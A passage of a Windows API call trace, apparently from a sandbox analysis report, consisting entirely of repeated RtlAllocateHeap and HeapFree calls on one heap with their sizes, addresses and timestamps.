(HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) 